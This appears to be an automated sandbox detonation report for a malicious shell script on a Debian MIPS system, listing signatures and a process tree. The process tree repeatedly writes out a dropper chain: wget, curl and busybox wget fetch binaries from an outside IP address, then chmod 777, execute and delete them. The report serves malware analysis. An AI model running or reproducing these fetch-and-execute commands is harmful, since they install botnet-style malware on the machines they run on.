SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/796-1-0xb66a8000-0xb66b9044-memory.dmp

memory/796-2-0xb677b000-0xb678c044-memory.dmp

memory/854-3-0xb6743000-0xb6754044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 03:52

Reported

2024-11-20 03:54

Platform

debian9-mipsbe-20240418-en

Max time kernel

93s

Max time network

95s

Command Line

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J N/A
N/A /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d N/A
N/A /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ N/A
N/A /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 N/A
N/A /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ N/A
N/A /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A
N/A /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD N/A
N/A /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 N/A
N/A /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL N/A
N/A /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz N/A
N/A /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 N/A
N/A /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto N/A
N/A /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC N/A
N/A /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev N/A
N/A /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD N/A
N/A /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 N/A
N/A /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL N/A
N/A /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz N/A
N/A /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 N/A
N/A /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J N/A
N/A /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d N/A
N/A /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ N/A
N/A /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 N/A
N/A /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ N/A
N/A /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /usr/bin/curl N/A
File opened for modification /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /usr/bin/curl N/A
File opened for modification /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /usr/bin/curl N/A
File opened for modification /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A
File opened for modification /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /usr/bin/curl N/A
File opened for modification /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /usr/bin/curl N/A
File opened for modification /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /usr/bin/curl N/A
File opened for modification /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 /usr/bin/curl N/A
File opened for modification /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /usr/bin/curl N/A
File opened for modification /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ /usr/bin/curl N/A
File opened for modification /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto /usr/bin/curl N/A
File opened for modification /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL /usr/bin/curl N/A
File opened for modification /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J /usr/bin/curl N/A
File opened for modification /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /usr/bin/curl N/A
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD /usr/bin/curl N/A
File opened for modification /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /usr/bin/curl N/A
File opened for modification /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC /usr/bin/curl N/A
File opened for modification /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev /usr/bin/curl N/A
File opened for modification /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /usr/bin/curl N/A
File opened for modification /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 /usr/bin/curl N/A
File opened for modification /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g /usr/bin/curl N/A
File opened for modification /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 /usr/bin/curl N/A
File opened for modification /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d /usr/bin/curl N/A
File opened for modification /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ /usr/bin/curl N/A
File opened for modification /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz /usr/bin/curl N/A

Processes

/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh

[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/chmod

[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/rm

[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/wget

[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/chmod

[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d

[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/rm

[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/wget

[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/chmod

[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ

[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/rm

[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/chmod

[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0

[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/bin/rm

[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/wget

[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/chmod

[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ

[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/bin/rm

[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/chmod

[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g

[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/bin/rm

[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/chmod

[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD

[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/rm

[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/wget

[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/chmod

[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1

[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/rm

[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/wget

[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/chmod

[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL

[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/rm

[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/wget

[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/chmod

[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz

[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/rm

[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/wget

[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/chmod

[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0

[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/rm

[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/chmod

[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto

[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/bin/rm

[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]

/usr/bin/wget

[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/chmod

[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC

[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/bin/rm

[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]

/usr/bin/wget

[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/chmod

[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev

[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/bin/rm

[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]

/usr/bin/wget

[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/chmod

[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD

[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/bin/rm

[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]

/usr/bin/wget

[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/chmod

[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1

[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/bin/rm

[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]

/usr/bin/wget

[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/chmod

[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL

[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/bin/rm

[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]

/usr/bin/wget

[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/chmod

[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz

[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/bin/rm

[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]

/usr/bin/wget

[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/chmod

[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0

[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/bin/rm

[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]

/usr/bin/wget

[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/chmod

[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J

[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/bin/rm

[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]

/usr/bin/wget

[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/chmod

[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d

[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/bin/rm

[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]

/usr/bin/wget

[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/chmod

[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ

[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/bin/rm

[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]

/usr/bin/wget

[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]

